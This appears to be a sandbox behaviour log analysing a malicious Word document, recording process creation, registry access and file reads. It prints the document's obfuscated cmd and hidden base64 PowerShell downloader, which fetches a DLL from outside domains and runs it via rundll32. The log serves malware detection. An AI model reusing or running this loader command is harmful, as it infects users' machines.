                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....%......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@&................u.............}..v.....&......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....-......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....5......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@6................u.............}..v.....6......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....=......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@>................u.............}..v.....>......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v.....E......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@F................u.............}..v.....F......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....'................/.j....@I]...............u.............}..v.....M......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................/.j....@N................u.............}..v.....N......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....3................/.j....@I]...............u.............}..v.....U......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................/.j....@V................u.............}..v.....V......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....?................/.j....@I]...............u.............}..v.....]......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................/.j....@^................u.............}..v.....^......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....K................/.j....@I]...............u.............}..v.....e......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................/.j....@f................u.............}..v.....f......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....W................/.j....@I]...............u.............}..v.....m......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................/.j....@n................u.............}..v.....n......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....c................/.j....@I]...............u.............}..v.....u......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................/.j....@v................u.............}..v.....v......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....o................/.j....@I]...............u.............}..v.....}......0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................/.j....@~................u.............}..v.....~......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v....{................/.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................/.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j....@.................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0................E].....<.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v....8.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v............0.................%.............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..%.............y=.v...................../.j....@I]...............u.............}..v....h.......0.................%.....r.......T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j.... .................u.............}..v............0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ......../.j....@I]...............u.............}..v....0.......0................E].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...................../.j......................u.............}..v....h.......0................F].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v............0...............X.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v....x4......0...............X.].............T...............
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: ARCH_25_012021.docVirustotal: Detection: 57%
                      Source: ARCH_25_012021.docReversingLabs: Detection: 26%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
